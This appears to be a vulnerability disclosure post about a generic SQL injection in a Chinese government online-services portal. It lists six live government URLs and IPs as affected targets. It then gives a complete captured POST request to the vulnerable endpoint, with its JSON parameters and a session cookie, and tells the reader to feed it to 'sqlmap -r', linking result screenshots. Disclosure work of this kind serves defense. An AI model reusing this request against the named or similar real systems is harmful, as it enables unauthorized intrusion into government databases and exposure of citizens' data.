### 简要描述:
rt
### 详细说明:
某政府在用系统通用型SQL注入#6。
案例:
http://218.65.5.117:8008/outportal/getbackpassw/getbackPas.jsp
http://120.203.196.20/outportal/getbackpassw/getbackPas.jsp
http://xzfw.jxcr.gov.cn/outportal/getbackpassw/getbackPas.jsp
http://xzfw.jinxi.gov.cn/outportal/getbackpassw/getbackPas.jsp
http://117.40.187.175:8008/outportal/getbackpassw/getbackPas.jsp
http://wssp.jiangxi.gov.cn:8008/outportal/getbackpassw/getbackPas.jsp
### 漏洞证明:
需要一个一个的抓包。
http://wssp.jiangxi.gov.cn:8008/outportal/getbackpassw/getbackPas.jsp
```
POST参数:
POST/outportal/command/ajax/com.ecgap.outinformationdocument.cmd.OutInformationDocumentQueryCommand/getLicese HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer:http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp
x-requested-with: XMLHttpRequest
Content-Type: application/json
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: wssp.jiangxi.gov.cn:8008
Content-Length: 108
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=EE31BE605CD71740C767AF5FA575E5D6
{"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"acceptno":"1","cerno":"1"},"length":2}}
```
用sqlmap -r 去跑。
[<img src="https://images.seebug.org/upload/201505/311024189eecdf903a123cc64b0c16d28367e95b.png" alt="QQ图片20150531101614.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/311024189eecdf903a123cc64b0c16d28367e95b.png)
[<img src="https://images.seebug.org/upload/201505/311024272c8738425d13d31167390cd518885d08.png" alt="QQ图片20150531101628.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/311024272c8738425d13d31167390cd518885d08.png)
京公网安备 11010502034610号
暂无评论